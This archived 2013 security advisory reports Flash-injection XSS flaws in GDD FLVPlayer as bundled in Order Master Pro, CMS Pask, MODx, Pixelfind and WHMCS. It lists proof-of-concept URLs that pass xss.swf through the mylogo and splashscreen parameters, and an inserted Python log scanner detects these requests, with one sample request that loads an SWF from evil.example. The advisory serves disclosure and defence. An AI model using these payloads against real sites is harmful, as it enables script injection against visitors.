SECURITYVULNS:DOC:29734
Sep 09, 2013 - 12:00 a.m.

Vulnerabilities in multiple web applications with GDD FLVPlayer

vulners.com

Hello 3APA3A!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is a Flash video and audio player which is used on thousands of web sites and in multiple web applications.

Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution and other web applications. This Flash video and audio player is also used on many web sites as a standalone web application.


Affected products:

Web applications using GDD FLVPlayer v3.635 and previous versions are vulnerable.

The following web applications are vulnerable:

Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).


Affected vendors:

GDD FLVPlayer was developed by GeDeDe.

GeDeDe
http://www.gdd.ro


Details:

XSS (via Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf

http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer for MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf

http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf

http://site/player/gddflvplayer.swf?splashscreen=xss.swf

These are examples of the XSS vulnerabilities; examples of the Content Spoofing (CS) vulnerabilities can be found in the above-mentioned advisory.
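As an added defender-side example that is not part of this advisory: a small Python scanner over web-server access logs that flags requests for gddflvplayer.swf whose mylogo or splashscreen parameter names an SWF file or an off-site URL, which is the pattern of the PoC URLs above. The log lines, IP addresses and the evil.example host are constructed; the assumption is that legitimate values for these two parameters are image files served from the same site.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Combined Log Format). IPs, timestamps and
# the evil.example host are invented; the paths follow the advisory's PoC URLs.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Sep/2013:10:00:01 +0000] "GET /op/video/gddflvplayer.swf?file=intro.flv&mylogo=logo.png HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.8 - - [09/Sep/2013:10:00:02 +0000] "GET /op/video/gddflvplayer.swf?mylogo=xss.swf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2013:10:00:03 +0000] "GET /player/gddflvplayer.swf?splashscreen=http://evil.example/x.swf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2013:10:00:04 +0000] "GET /assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=%2Fimg%2Fsplash.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.10 - - [09/Sep/2013:10:00:05 +0000] "GET /index.php?mylogo=xss.swf HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# The two player parameters the advisory shows being abused for Flash injection.
INJECTABLE_PARAMS = ("mylogo", "splashscreen")

def suspicious_value(value: str) -> bool:
    """A logo/splash value is suspicious if it names a SWF or leaves the site
    (absolute or protocol-relative URL). Assumes legitimate values are same-site images."""
    decoded = unquote(value).strip().lower()
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc or decoded.startswith("//"):
        return True
    return parts.path.endswith(".swf")

def scan_log(text: str) -> list:
    """Return one finding per request for gddflvplayer.swf whose mylogo or
    splashscreen value is suspicious; other paths and benign values are skipped."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith("/gddflvplayer.swf"):
            continue
        params = parse_qs(target.query, keep_blank_values=True)
        for name in INJECTABLE_PARAMS:
            for value in params.get(name, []):
                if suspicious_value(value):
                    findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                     "path": target.path, "param": name, "value": value})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']}")
```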

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6727/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua